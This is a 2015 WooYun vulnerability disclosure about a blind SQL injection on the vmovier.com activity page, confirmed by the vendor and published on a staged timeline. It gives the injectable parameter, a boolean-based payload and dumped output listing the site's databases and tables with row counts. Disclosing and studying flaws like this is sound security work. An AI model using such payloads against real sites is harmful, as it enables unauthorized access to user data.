当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115149

漏洞标题:V电影主站SQL注射,影响全站数据库

相关厂商:vmovier.com

漏洞作者: 路人甲

提交时间:2015-05-20 14:31

修复时间:2015-07-04 16:34

公开时间:2015-07-04 16:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-20: 细节已通知厂商并且等待厂商处理中
2015-05-20: 厂商已经确认,细节仅向厂商公开
2015-05-30: 细节向核心白帽子及相关领域专家公开
2015-06-09: 细节向普通白帽子公开
2015-06-19: 细节向实习白帽子公开
2015-07-04: 细节向公众公开

简要描述:

233

详细说明:

www.vmovier.com/activity?ing=2
注入点不复杂,直接盲注

漏洞证明:

---
Parameter: ing (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ing=2) AND 4422=4422 AND (1427=1427
---
web application technology: PHP 5.4.25
back-end DBMS: MySQL 5
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sns
[*] wechat
部分数据库信息如下:
Database: sns
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| v_search_log | 4520367 |
| ts_article_view | 1243630 |
| ts_user_follow | 885994 |
| ts_visitor | 766180 |
| v_statis_post | 585257 |
| v_user_view | 491295 |
| v_notice | 338652 |
| v_app_notice | 317077 |
| ts_group_topics_view | 241841 |
| ts_user | 177595 |
| ts_user_info | 177388 |
| ts_user_bind | 176211 |
| ts_message | 154819 |
| v_user_post | 152742 |
| v_ad_statistic | 124319 |
| ts_feed | 99460 |
| ts_user_space | 93801 |
| v_search | 90738 |
| v_comment | 86623 |
| ts_group_users | 59345 |
| ts_user_domain_visit | 51671 |
| ts_station_user | 43683 |
| ts_invite | 40016 |
| ts_hide_system_msg_list | 36595 |
| ts_article_comment | 33392 |
| ts_plats_users | 27984 |
| v_404 | 25820 |
| ts_user_login | 25197 |
| v_user_series | 20571 |
| v_tag_post | 20176 |
| ts_article_like | 17067 |
| ts_article | 13180 |
| ts_kw | 12596 |
| v_tag | 12157 |
| ts_group_view | 11855 |
| ts_stills_photo | 11148 |
| v_cate_post | 9724 |
| ts_tag_user_index | 9160 |
| v_user_comment | 9106 |
| ts_user_bind_n | 7410 |
| ts_station_view | 7347 |
| v_post | 6871 |
| ts_article_videos | 5940 |
| v_rating | 5723 |
| ts_article_recommend | 5208 |
| ts_tag_exp_index | 4786 |
| v_user_series_post | 4438 |
| ts_comment_approve | 4227 |
| ts_group_topics_comments | 4207 |
| ts_user_verify | 3625 |
| v_post_add | 3603 |
| v_activity_form | 3366 |
| ts_invitation_code | 3365 |
| ts_area | 3144 |
| v_qiniu_notice | 3020 |
| v_graduation_like | 2666 |
| ts_tag | 2601 |
| v_movie | 2469 |
| v_ac_like | 2201 |
| ts_square_new_old | 1923 |
| ts_exp | 1921 |
| ts_square_new | 1905 |
| ts_group_topics | 1891 |
| v_video_cs | 1798 |
| ts_article_collect | 1781 |
| ts_day_home | 1749 |
| ts_stills | 1554 |
| v_user_album | 1179 |
| v_video_recommend | 1163 |
| v_content_find | 1111 |
| ts_banner_log | 1095 |
| v_series_post | 1081 |
。。。。。

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-05-20 16:32

厂商回复:

非常感谢发现该漏洞

最新状态:

暂无


漏洞评价:

评论